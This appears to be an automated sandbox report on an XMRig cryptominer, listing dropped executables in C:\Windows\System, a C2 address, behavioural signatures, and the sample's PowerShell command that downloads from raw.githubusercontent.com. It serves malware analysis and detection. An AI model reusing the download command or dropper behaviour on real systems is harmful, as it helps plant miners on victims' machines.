C:\Windows\System\sunVAmT.exe

C:\Windows\System\sunVAmT.exe

C:\Windows\System\tTfNrsT.exe

C:\Windows\System\tTfNrsT.exe

C:\Windows\System\XcvdrMi.exe

C:\Windows\System\XcvdrMi.exe

C:\Windows\System\HWgGWpI.exe

C:\Windows\System\HWgGWpI.exe

C:\Windows\System\SxtAUwU.exe

C:\Windows\System\SxtAUwU.exe

C:\Windows\System\gIpdyjv.exe

C:\Windows\System\gIpdyjv.exe

C:\Windows\System\QxxJvQx.exe

C:\Windows\System\QxxJvQx.exe

C:\Windows\System\URyBMVl.exe

C:\Windows\System\URyBMVl.exe

C:\Windows\System\XEWUUHs.exe

C:\Windows\System\XEWUUHs.exe

C:\Windows\System\ntKziOZ.exe

C:\Windows\System\ntKziOZ.exe

C:\Windows\System\iMZVGil.exe

C:\Windows\System\iMZVGil.exe

C:\Windows\System\lgdhklO.exe

C:\Windows\System\lgdhklO.exe

C:\Windows\System\xlTkJNd.exe

C:\Windows\System\xlTkJNd.exe

C:\Windows\System\ZzcMzrb.exe

C:\Windows\System\ZzcMzrb.exe

C:\Windows\System\PvWUPfb.exe

C:\Windows\System\PvWUPfb.exe

C:\Windows\System\MuajJXv.exe

C:\Windows\System\MuajJXv.exe

C:\Windows\System\bSJUHaz.exe

C:\Windows\System\bSJUHaz.exe

C:\Windows\System\cWbWlhx.exe

C:\Windows\System\cWbWlhx.exe

C:\Windows\System\YqNPEcs.exe

C:\Windows\System\YqNPEcs.exe

C:\Windows\System\EgilLPV.exe

C:\Windows\System\EgilLPV.exe

C:\Windows\System\GxHrLMe.exe

C:\Windows\System\GxHrLMe.exe

C:\Windows\System\bBClWnJ.exe

C:\Windows\System\bBClWnJ.exe

C:\Windows\System\ZzJKcWd.exe

C:\Windows\System\ZzJKcWd.exe

C:\Windows\System\zLWFZgm.exe

C:\Windows\System\zLWFZgm.exe

C:\Windows\System\ElzEhKv.exe

C:\Windows\System\ElzEhKv.exe

C:\Windows\System\yoAwBMD.exe

C:\Windows\System\yoAwBMD.exe

C:\Windows\System\LCLdbLE.exe

C:\Windows\System\LCLdbLE.exe

C:\Windows\System\GicZkka.exe

C:\Windows\System\GicZkka.exe

C:\Windows\System\zttQVgQ.exe

C:\Windows\System\zttQVgQ.exe

C:\Windows\System\vSMUOuz.exe

C:\Windows\System\vSMUOuz.exe

C:\Windows\System\NhBNtFn.exe

C:\Windows\System\NhBNtFn.exe

C:\Windows\System\HGKQnHb.exe

C:\Windows\System\HGKQnHb.exe

C:\Windows\System\DmebTFM.exe

C:\Windows\System\DmebTFM.exe

C:\Windows\System\MtkFkSQ.exe

C:\Windows\System\MtkFkSQ.exe

C:\Windows\System\qEcxJlS.exe

C:\Windows\System\qEcxJlS.exe

C:\Windows\System\WIeytii.exe

C:\Windows\System\WIeytii.exe

C:\Windows\System\ARLcsMO.exe

C:\Windows\System\ARLcsMO.exe

C:\Windows\System\GehlzKp.exe

C:\Windows\System\GehlzKp.exe

C:\Windows\System\JDrIihV.exe

C:\Windows\System\JDrIihV.exe

C:\Windows\System\aDHABAq.exe

C:\Windows\System\aDHABAq.exe

C:\Windows\System\iSGJiFb.exe

C:\Windows\System\iSGJiFb.exe

C:\Windows\System\KIXjcMg.exe

C:\Windows\System\KIXjcMg.exe

C:\Windows\System\RAgodRJ.exe

C:\Windows\System\RAgodRJ.exe

C:\Windows\System\SdWSxCM.exe

C:\Windows\System\SdWSxCM.exe

C:\Windows\System\gERgsUt.exe

C:\Windows\System\gERgsUt.exe

C:\Windows\System\ZqGvmYO.exe

C:\Windows\System\ZqGvmYO.exe

C:\Windows\System\lahCBYj.exe

C:\Windows\System\lahCBYj.exe

C:\Windows\System\OLNHVvY.exe

C:\Windows\System\OLNHVvY.exe

C:\Windows\System\sWmkPzI.exe

C:\Windows\System\sWmkPzI.exe

C:\Windows\System\fGirMzJ.exe

C:\Windows\System\fGirMzJ.exe

C:\Windows\System\dqlEokm.exe

C:\Windows\System\dqlEokm.exe

C:\Windows\System\IxsIGdb.exe

C:\Windows\System\IxsIGdb.exe

C:\Windows\System\qafXpDb.exe

C:\Windows\System\qafXpDb.exe

C:\Windows\System\fhBcZyv.exe

C:\Windows\System\fhBcZyv.exe

C:\Windows\System\FjZqGDB.exe

C:\Windows\System\FjZqGDB.exe

C:\Windows\System\brgxrnW.exe

C:\Windows\System\brgxrnW.exe

C:\Windows\System\TtQLfxR.exe

C:\Windows\System\TtQLfxR.exe

C:\Windows\System\TFhVDDF.exe

C:\Windows\System\TFhVDDF.exe

C:\Windows\System\orkSGck.exe

C:\Windows\System\orkSGck.exe

C:\Windows\System\ySdIweh.exe

C:\Windows\System\ySdIweh.exe

C:\Windows\System\ylfMLqV.exe

C:\Windows\System\ylfMLqV.exe

C:\Windows\System\WlmIzlo.exe

C:\Windows\System\WlmIzlo.exe

C:\Windows\System\CYgPiZD.exe

C:\Windows\System\CYgPiZD.exe

C:\Windows\System\rLJOfoX.exe

C:\Windows\System\rLJOfoX.exe

C:\Windows\System\fKcQWUw.exe

C:\Windows\System\fKcQWUw.exe

C:\Windows\System\vXSzTJh.exe

C:\Windows\System\vXSzTJh.exe

C:\Windows\System\eJhPXra.exe

C:\Windows\System\eJhPXra.exe

C:\Windows\System\CLJcpAD.exe

C:\Windows\System\CLJcpAD.exe

C:\Windows\System\NNLOTNV.exe

C:\Windows\System\NNLOTNV.exe

C:\Windows\System\ZxsQZWw.exe

C:\Windows\System\ZxsQZWw.exe

C:\Windows\System\tJWWMcd.exe

C:\Windows\System\tJWWMcd.exe

C:\Windows\System\XhuQACk.exe

C:\Windows\System\XhuQACk.exe

C:\Windows\System\UHEenTm.exe

C:\Windows\System\UHEenTm.exe

C:\Windows\System\iBTRVtR.exe

C:\Windows\System\iBTRVtR.exe

C:\Windows\System\IykUuql.exe

C:\Windows\System\IykUuql.exe

C:\Windows\System\ZmKLyQb.exe

C:\Windows\System\ZmKLyQb.exe

C:\Windows\System\qgpJRQN.exe

C:\Windows\System\qgpJRQN.exe

C:\Windows\System\IJgUnax.exe

C:\Windows\System\IJgUnax.exe

C:\Windows\System\rzTQiYh.exe

C:\Windows\System\rzTQiYh.exe

C:\Windows\System\zajGceN.exe

C:\Windows\System\zajGceN.exe

C:\Windows\System\rlVTgzZ.exe

C:\Windows\System\rlVTgzZ.exe

C:\Windows\System\fIRXPYx.exe

C:\Windows\System\fIRXPYx.exe

C:\Windows\System\eFXFfXs.exe

C:\Windows\System\eFXFfXs.exe

C:\Windows\System\cuzEFHq.exe

C:\Windows\System\cuzEFHq.exe

C:\Windows\System\MNnGjtK.exe

C:\Windows\System\MNnGjtK.exe

C:\Windows\System\eWWKdTd.exe

C:\Windows\System\eWWKdTd.exe

C:\Windows\System\OixxAkX.exe

C:\Windows\System\OixxAkX.exe

C:\Windows\System\YCKEpwY.exe

C:\Windows\System\YCKEpwY.exe

C:\Windows\System\kbuBSFZ.exe

C:\Windows\System\kbuBSFZ.exe

C:\Windows\System\WaUKUSK.exe

C:\Windows\System\WaUKUSK.exe

C:\Windows\System\uItgFKJ.exe

C:\Windows\System\uItgFKJ.exe

C:\Windows\System\uLIfZCM.exe

C:\Windows\System\uLIfZCM.exe

C:\Windows\System\ZfvSxSz.exe

C:\Windows\System\ZfvSxSz.exe

C:\Windows\System\dXLcLkG.exe

C:\Windows\System\dXLcLkG.exe

C:\Windows\System\aXzRgln.exe

C:\Windows\System\aXzRgln.exe

C:\Windows\System\jAOOVHT.exe

C:\Windows\System\jAOOVHT.exe

C:\Windows\System\hyuFVgF.exe

C:\Windows\System\hyuFVgF.exe

C:\Windows\System\eTLOYFn.exe

C:\Windows\System\eTLOYFn.exe

C:\Windows\System\BXSAzYh.exe

C:\Windows\System\BXSAzYh.exe

C:\Windows\System\RDZxpQA.exe

C:\Windows\System\RDZxpQA.exe

C:\Windows\System\KfGJDvE.exe

C:\Windows\System\KfGJDvE.exe

C:\Windows\System\xPkAiix.exe

C:\Windows\System\xPkAiix.exe

C:\Windows\System\QxwZwLi.exe

C:\Windows\System\QxwZwLi.exe

C:\Windows\System\TXdNzwh.exe

C:\Windows\System\TXdNzwh.exe

C:\Windows\System\frsrKAz.exe

C:\Windows\System\frsrKAz.exe

C:\Windows\System\acdPRbQ.exe

C:\Windows\System\acdPRbQ.exe

C:\Windows\System\KrTyoSB.exe

C:\Windows\System\KrTyoSB.exe

C:\Windows\System\FTiqzmM.exe

C:\Windows\System\FTiqzmM.exe

C:\Windows\System\LPBfmzV.exe

C:\Windows\System\LPBfmzV.exe

C:\Windows\System\leEEgOX.exe

C:\Windows\System\leEEgOX.exe

C:\Windows\System\axJIPBs.exe

C:\Windows\System\axJIPBs.exe

C:\Windows\System\uIOuQXb.exe

C:\Windows\System\uIOuQXb.exe

C:\Windows\System\uRNirqO.exe

C:\Windows\System\uRNirqO.exe

C:\Windows\System\ZtcfjgS.exe

C:\Windows\System\ZtcfjgS.exe

C:\Windows\System\wfcSstU.exe

C:\Windows\System\wfcSstU.exe

C:\Windows\System\ZVOISEr.exe

C:\Windows\System\ZVOISEr.exe

C:\Windows\System\sHXFiWg.exe

C:\Windows\System\sHXFiWg.exe

C:\Windows\System\ZicwcfX.exe

C:\Windows\System\ZicwcfX.exe

C:\Windows\System\lTidCXQ.exe

C:\Windows\System\lTidCXQ.exe

C:\Windows\System\ONGaJTX.exe

C:\Windows\System\ONGaJTX.exe

C:\Windows\System\vZkZynB.exe

C:\Windows\System\vZkZynB.exe

C:\Windows\System\knvppRD.exe

C:\Windows\System\knvppRD.exe

C:\Windows\System\ZVVUrhB.exe

C:\Windows\System\ZVVUrhB.exe

C:\Windows\System\JHRyhpP.exe

C:\Windows\System\JHRyhpP.exe

C:\Windows\System\yOGHZIC.exe

C:\Windows\System\yOGHZIC.exe

C:\Windows\System\FsOEGiV.exe

C:\Windows\System\FsOEGiV.exe

C:\Windows\System\RdHVIxX.exe

C:\Windows\System\RdHVIxX.exe

C:\Windows\System\zGlACbP.exe

C:\Windows\System\zGlACbP.exe

C:\Windows\System\IWPAYhR.exe

C:\Windows\System\IWPAYhR.exe

C:\Windows\System\UbhgHfy.exe

C:\Windows\System\UbhgHfy.exe

C:\Windows\System\OOMPHCK.exe

C:\Windows\System\OOMPHCK.exe

C:\Windows\System\LNdwnyf.exe

C:\Windows\System\LNdwnyf.exe

C:\Windows\System\fEWfTfL.exe

C:\Windows\System\fEWfTfL.exe

C:\Windows\System\vduFGTp.exe

C:\Windows\System\vduFGTp.exe

C:\Windows\System\YFcmmoD.exe

C:\Windows\System\YFcmmoD.exe

C:\Windows\System\usWzMbt.exe

C:\Windows\System\usWzMbt.exe

C:\Windows\System\SjTJRuR.exe

C:\Windows\System\SjTJRuR.exe

C:\Windows\System\XEXPcEU.exe

C:\Windows\System\XEXPcEU.exe

C:\Windows\System\YSOQEpV.exe

C:\Windows\System\YSOQEpV.exe

C:\Windows\System\aNGPoJY.exe

C:\Windows\System\aNGPoJY.exe

C:\Windows\System\CWymJvE.exe

C:\Windows\System\CWymJvE.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 12:56

Reported

2024-06-13 12:59

Platform

win10v2004-20240508-en

Max time kernel

69s

Max time network

47s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4544 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4544 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\wlnfQlw.exe
PID 4544 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\wlnfQlw.exe
PID 4544 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\nalNpft.exe
PID 4544 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\nalNpft.exe
PID 4544 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\iTjotIJ.exe
PID 4544 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\iTjotIJ.exe
PID 4544 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUxMdy.exe
PID 4544 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUxMdy.exe
PID 4544 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\pnfJbtm.exe
PID 4544 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\pnfJbtm.exe
PID 4544 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gfWGAiB.exe
PID 4544 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gfWGAiB.exe
PID 4544 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUGaOw.exe
PID 4544 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUGaOw.exe
PID 4544 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\FspcJwC.exe
PID 4544 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\FspcJwC.exe
PID 4544 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\lqUyUzR.exe
PID 4544 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\lqUyUzR.exe
PID 4544 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\faffRMB.exe
PID 4544 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\faffRMB.exe
PID 4544 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\cnTGeLE.exe
PID 4544 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\cnTGeLE.exe
PID 4544 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\thYHXrT.exe
PID 4544 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\thYHXrT.exe
PID 4544 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YTDxbcK.exe
PID 4544 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YTDxbcK.exe
PID 4544 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gBCVGiF.exe
PID 4544 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gBCVGiF.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\NHEsSGK.exe

C:\Windows\System\NHEsSGK.exe

C:\Windows\System\DpvcHgy.exe

C:\Windows\System\DpvcHgy.exe

C:\Windows\System\taaoAoX.exe

C:\Windows\System\taaoAoX.exe

C:\Windows\System\CKDKmsX.exe

C:\Windows\System\CKDKmsX.exe

C:\Windows\System\hZLqZDW.exe

C:\Windows\System\hZLqZDW.exe

C:\Windows\System\DHaotUR.exe

C:\Windows\System\DHaotUR.exe

C:\Windows\System\rjOjrIs.exe

C:\Windows\System\rjOjrIs.exe

C:\Windows\System\UulsUqJ.exe

C:\Windows\System\UulsUqJ.exe

C:\Windows\System\RLfNTIZ.exe

C:\Windows\System\RLfNTIZ.exe

C:\Windows\System\hqULbaB.exe

C:\Windows\System\hqULbaB.exe

C:\Windows\System\RnWSCQc.exe

C:\Windows\System\RnWSCQc.exe

C:\Windows\System\vwwplZm.exe

C:\Windows\System\vwwplZm.exe

C:\Windows\System\IUitenW.exe

C:\Windows\System\IUitenW.exe

C:\Windows\System\QlXmrqX.exe

C:\Windows\System\QlXmrqX.exe

C:\Windows\System\dOxLYrN.exe

C:\Windows\System\dOxLYrN.exe

C:\Windows\System\cqdlZWx.exe

C:\Windows\System\cqdlZWx.exe

C:\Windows\System\niSdzCi.exe

C:\Windows\System\niSdzCi.exe

C:\Windows\System\JkBuIxf.exe

C:\Windows\System\JkBuIxf.exe

C:\Windows\System\zFeMJEu.exe

C:\Windows\System\zFeMJEu.exe

C:\Windows\System\UGizIvU.exe

C:\Windows\System\UGizIvU.exe

C:\Windows\System\cyckvkr.exe

C:\Windows\System\cyckvkr.exe

C:\Windows\System\jkCCwyo.exe

C:\Windows\System\jkCCwyo.exe

C:\Windows\System\twoLTWt.exe

C:\Windows\System\twoLTWt.exe

C:\Windows\System\RJCRUly.exe

C:\Windows\System\RJCRUly.exe

C:\Windows\System\JyUnBqz.exe

C:\Windows\System\JyUnBqz.exe

C:\Windows\System\AtfjOyZ.exe

C:\Windows\System\AtfjOyZ.exe

C:\Windows\System\JQKCrwL.exe

C:\Windows\System\JQKCrwL.exe

C:\Windows\System\refLVyJ.exe

C:\Windows\System\refLVyJ.exe

C:\Windows\System\qtTqpyh.exe

C:\Windows\System\qtTqpyh.exe

C:\Windows\System\qbufXQO.exe

C:\Windows\System\qbufXQO.exe

C:\Windows\System\EjnUkmn.exe

C:\Windows\System\EjnUkmn.exe

C:\Windows\System\qQzQRKt.exe

C:\Windows\System\qQzQRKt.exe

C:\Windows\System\CYcHtkl.exe

C:\Windows\System\CYcHtkl.exe

C:\Windows\System\wOCBtLz.exe

C:\Windows\System\wOCBtLz.exe

C:\Windows\System\ArylkMF.exe

C:\Windows\System\ArylkMF.exe

C:\Windows\System\mCBJeBO.exe

C:\Windows\System\mCBJeBO.exe

C:\Windows\System\TztwkZC.exe

C:\Windows\System\TztwkZC.exe

C:\Windows\System\HeaKnRu.exe

C:\Windows\System\HeaKnRu.exe

C:\Windows\System\dvqxoTc.exe

C:\Windows\System\dvqxoTc.exe

C:\Windows\System\ZkXNGBj.exe

C:\Windows\System\ZkXNGBj.exe

C:\Windows\System\hGsJIdw.exe

C:\Windows\System\hGsJIdw.exe

C:\Windows\System\PInoexP.exe

C:\Windows\System\PInoexP.exe

C:\Windows\System\zcOyxRQ.exe

C:\Windows\System\zcOyxRQ.exe

C:\Windows\System\trLJAjK.exe

C:\Windows\System\trLJAjK.exe

C:\Windows\System\DIxLino.exe

C:\Windows\System\DIxLino.exe

C:\Windows\System\rQzAGqU.exe

C:\Windows\System\rQzAGqU.exe

C:\Windows\System\qlBbeUR.exe

C:\Windows\System\qlBbeUR.exe

C:\Windows\System\gBUWbtY.exe

C:\Windows\System\gBUWbtY.exe

C:\Windows\System\CqJyIFu.exe

C:\Windows\System\CqJyIFu.exe

C:\Windows\System\TcBmUeI.exe

C:\Windows\System\TcBmUeI.exe

C:\Windows\System\yWBjBzt.exe

C:\Windows\System\yWBjBzt.exe

C:\Windows\System\cXNHIoX.exe

C:\Windows\System\cXNHIoX.exe

C:\Windows\System\EAOPspK.exe

C:\Windows\System\EAOPspK.exe

C:\Windows\System\XLygpER.exe

C:\Windows\System\XLygpER.exe

C:\Windows\System\KWAKzvx.exe

C:\Windows\System\KWAKzvx.exe

C:\Windows\System\OkFBLYj.exe

C:\Windows\System\OkFBLYj.exe

C:\Windows\System\EjpkcgA.exe

C:\Windows\System\EjpkcgA.exe

C:\Windows\System\QvcxcRj.exe

C:\Windows\System\QvcxcRj.exe

C:\Windows\System\ffdRGmM.exe

C:\Windows\System\ffdRGmM.exe

C:\Windows\System\YvTtgiH.exe

C:\Windows\System\YvTtgiH.exe

C:\Windows\System\htpqJKh.exe

C:\Windows\System\htpqJKh.exe

C:\Windows\System\kYrKZJy.exe

C:\Windows\System\kYrKZJy.exe

C:\Windows\System\mQmmqDL.exe

C:\Windows\System\mQmmqDL.exe

C:\Windows\System\tEMHFVB.exe

C:\Windows\System\tEMHFVB.exe

C:\Windows\System\IQvzSKk.exe

C:\Windows\System\IQvzSKk.exe

C:\Windows\System\xNglcbE.exe

C:\Windows\System\xNglcbE.exe

C:\Windows\System\iCIorxp.exe

C:\Windows\System\iCIorxp.exe

C:\Windows\System\suMMhdf.exe

C:\Windows\System\suMMhdf.exe

C:\Windows\System\FdhBLvl.exe

C:\Windows\System\FdhBLvl.exe

C:\Windows\System\vLEulFP.exe

C:\Windows\System\vLEulFP.exe

C:\Windows\System\FqSdXMe.exe

C:\Windows\System\FqSdXMe.exe

C:\Windows\System\ybyutDB.exe

C:\Windows\System\ybyutDB.exe

C:\Windows\System\LFxAqhV.exe

C:\Windows\System\LFxAqhV.exe

C:\Windows\System\yXyBMky.exe

C:\Windows\System\yXyBMky.exe

C:\Windows\System\ogfPWCt.exe

C:\Windows\System\ogfPWCt.exe

C:\Windows\System\wyDmeTb.exe

C:\Windows\System\wyDmeTb.exe

C:\Windows\System\LRoQXkr.exe

C:\Windows\System\LRoQXkr.exe

C:\Windows\System\UrhQjpc.exe

C:\Windows\System\UrhQjpc.exe

C:\Windows\System\jrpNVVl.exe

C:\Windows\System\jrpNVVl.exe

C:\Windows\System\YQnJtrz.exe

C:\Windows\System\YQnJtrz.exe

C:\Windows\System\rDqHVQh.exe

C:\Windows\System\rDqHVQh.exe

C:\Windows\System\wPnjkdG.exe

C:\Windows\System\wPnjkdG.exe

C:\Windows\System\GEsduue.exe

C:\Windows\System\GEsduue.exe

C:\Windows\System\EKcEJWd.exe

C:\Windows\System\EKcEJWd.exe

C:\Windows\System\NgOGjHa.exe

C:\Windows\System\NgOGjHa.exe

C:\Windows\System\dEISCtc.exe

C:\Windows\System\dEISCtc.exe

C:\Windows\System\PBjqcgs.exe

C:\Windows\System\PBjqcgs.exe

C:\Windows\System\bKurmAe.exe

C:\Windows\System\bKurmAe.exe

C:\Windows\System\xKUJUvc.exe

C:\Windows\System\xKUJUvc.exe

C:\Windows\System\cFEauvs.exe

C:\Windows\System\cFEauvs.exe

C:\Windows\System\VvAuRuk.exe

C:\Windows\System\VvAuRuk.exe

C:\Windows\System\UvVSjRl.exe

C:\Windows\System\UvVSjRl.exe

C:\Windows\System\elWetLQ.exe

C:\Windows\System\elWetLQ.exe

C:\Windows\System\ZqWwOTl.exe

C:\Windows\System\ZqWwOTl.exe

C:\Windows\System\KSKeEkK.exe

C:\Windows\System\KSKeEkK.exe

C:\Windows\System\WKbJkdC.exe

C:\Windows\System\WKbJkdC.exe

C:\Windows\System\OLiZrSP.exe

C:\Windows\System\OLiZrSP.exe

C:\Windows\System\aBbJtyS.exe

C:\Windows\System\aBbJtyS.exe

C:\Windows\System\nZsolRY.exe

C:\Windows\System\nZsolRY.exe

C:\Windows\System\JDiKOIX.exe

C:\Windows\System\JDiKOIX.exe

C:\Windows\System\XfVIPPQ.exe

C:\Windows\System\XfVIPPQ.exe

C:\Windows\System\QvTugRx.exe

C:\Windows\System\QvTugRx.exe

C:\Windows\System\itqPknd.exe

C:\Windows\System\itqPknd.exe

C:\Windows\System\AUZPqNw.exe

C:\Windows\System\AUZPqNw.exe

C:\Windows\System\WoPMvvq.exe

C:\Windows\System\WoPMvvq.exe

C:\Windows\System\XBbmllT.exe

C:\Windows\System\XBbmllT.exe

C:\Windows\System\fftUiMP.exe

C:\Windows\System\fftUiMP.exe

C:\Windows\System\YhcmFBk.exe

C:\Windows\System\YhcmFBk.exe

C:\Windows\System\nkjxqLf.exe

C:\Windows\System\nkjxqLf.exe

C:\Windows\System\GWnOSSM.exe

C:\Windows\System\GWnOSSM.exe

C:\Windows\System\dIIDBEC.exe

C:\Windows\System\dIIDBEC.exe

C:\Windows\System\AUQmfwy.exe

C:\Windows\System\AUQmfwy.exe

C:\Windows\System\ysgisSC.exe

C:\Windows\System\ysgisSC.exe

C:\Windows\System\nxLbHNQ.exe

C:\Windows\System\nxLbHNQ.exe

C:\Windows\System\bPQmxRX.exe

C:\Windows\System\bPQmxRX.exe

C:\Windows\System\hsjVKRQ.exe

C:\Windows\System\hsjVKRQ.exe

C:\Windows\System\lSbqZiB.exe

C:\Windows\System\lSbqZiB.exe

C:\Windows\System\hJsGZGZ.exe

C:\Windows\System\hJsGZGZ.exe

C:\Windows\System\MecRUlO.exe

C:\Windows\System\MecRUlO.exe

C:\Windows\System\KQyuoyI.exe

C:\Windows\System\KQyuoyI.exe

C:\Windows\System\POaljZw.exe

C:\Windows\System\POaljZw.exe

C:\Windows\System\PAHRavm.exe

C:\Windows\System\PAHRavm.exe

C:\Windows\System\XzdSpps.exe

C:\Windows\System\XzdSpps.exe

C:\Windows\System\XETvtpK.exe

C:\Windows\System\XETvtpK.exe

C:\Windows\System\rwBgwvZ.exe

C:\Windows\System\rwBgwvZ.exe

C:\Windows\System\dTwynIQ.exe

C:\Windows\System\dTwynIQ.exe

C:\Windows\System\YJbZxIw.exe

C:\Windows\System\YJbZxIw.exe

C:\Windows\System\APOYRaB.exe

C:\Windows\System\APOYRaB.exe

C:\Windows\System\MQEnOQH.exe

C:\Windows\System\MQEnOQH.exe

C:\Windows\System\BGNJAgw.exe

C:\Windows\System\BGNJAgw.exe

C:\Windows\System\XoqePuq.exe

C:\Windows\System\XoqePuq.exe

C:\Windows\System\ZNpuzeU.exe

C:\Windows\System\ZNpuzeU.exe

C:\Windows\System\huMSIhL.exe

C:\Windows\System\huMSIhL.exe

C:\Windows\System\dOlQsjb.exe

C:\Windows\System\dOlQsjb.exe

C:\Windows\System\MjYHzZV.exe

C:\Windows\System\MjYHzZV.exe

C:\Windows\System\EiMrAKk.exe

C:\Windows\System\EiMrAKk.exe

C:\Windows\System\ajeGCDY.exe

C:\Windows\System\ajeGCDY.exe

C:\Windows\System\WCVQYqm.exe

C:\Windows\System\WCVQYqm.exe

C:\Windows\System\HXxNtXE.exe

C:\Windows\System\HXxNtXE.exe

C:\Windows\System\uPdcquX.exe

C:\Windows\System\uPdcquX.exe

C:\Windows\System\JsvSmrH.exe

C:\Windows\System\JsvSmrH.exe

C:\Windows\System\mFBdvFp.exe

C:\Windows\System\mFBdvFp.exe

C:\Windows\System\jnrLZIj.exe

C:\Windows\System\jnrLZIj.exe

C:\Windows\System\cIlSWXY.exe

C:\Windows\System\cIlSWXY.exe

